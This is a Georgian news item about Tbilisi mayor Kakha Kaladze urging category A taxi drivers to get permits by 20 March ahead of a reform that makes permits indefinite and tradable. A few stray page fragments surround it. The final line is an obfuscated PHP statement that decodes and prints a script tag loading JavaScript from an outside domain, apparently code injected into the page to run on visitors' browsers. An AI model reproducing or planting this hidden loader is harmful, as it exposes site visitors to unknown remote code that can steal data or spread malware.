celsiusi
ავერსი შნაიდერი

თბილისის მერი კახა კალაძე A კატეგორიის ტაქსის მძღოლებს 20 მარტამდე ნებართვების აღებისკენ მოუწოდებს. ამის შესახებ თბილისის მერმა დედაქალაქის დღევანდელ მთავრობის სხდომის დაწყებამდე განაცხადა.

„მეგობრებო, ძალიან დიდი თხოვნაა იმოქმედეთ, თორემ დარჩებით ისე და არ მინდა ვინმე უკმაყოფილო დარჩეთ. მოვუწოდებ იმ პირებს, რომლებიც A კატეგორიის ტაქსებს მართავენ და არასდროს აუღიათ ნებართვა, 20 მარტამდე აუცილებლად მიმართონ მუნიციპალიტეტს და აიღონ ძველი სისტემით გათვალისწინებული ნებართვა. მეგობრებო, ძალიან დიდი თხოვნაა იმოქმედეთ, თორემ დარჩებით ისე და არ მინდა ვინმე უკმაყოფილო დარჩეთ. წინააღმდეგ შემთხვევაში 1-ელი აპრილიდან უვადო ნებართვებს ვეღარ მიიღებთ. ამიტომ ჩემი თხოვნაა იაქტიუროთ და 20 მარტამდე აიღოთ ნებართვა, წინააღმდეგ შემთხვევაში პირველი აპრილიდან უვადო ნებართვებს ვეღარ მიიღებთ“, - განაცხადა კალაძემ.

ცნობისთვის: თბილისის მერია 1-ელი აპრილიდან ტაქსების რეფორმის მესამე ეტაპს იწყებს. მერიის ინფორმაციით, მესამე ეტაპის დროს ერთწლიანი A კატეგორიის ნებართვების გაცემა უვადო გახდება. რეფორმის ამ ეტაპზე ასევე შეიქმნება A კატეგორიის ნებართვების ბაზარი, რაც გულისხმობს იმას, რომ ნებართვების მფლობელს მისი ყიდვა/გაყიდვა ან/და იჯარით გაცემა შეეძლება. აქედან გამომდინარე, მერიაში მიაჩნიათ, რომ ტაქსის ნებართვა მისი მფლობელისთვის ერთგვარი ფინანსური აქტივი იქნება.

აღსანიშნია, რომ ტაქსის ნებართვის შეძენა, გასხვისება, იჯარით გაცემა და მიღება შეეძლებათ როგორც ფიზიკურ, ასევე იურიდიულ პირებს. აქამდე A კატეგორიის ტაქსის ლიცენზიის გაცემა იურიდიულ პირებზე არ ხდებოდა.

405
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");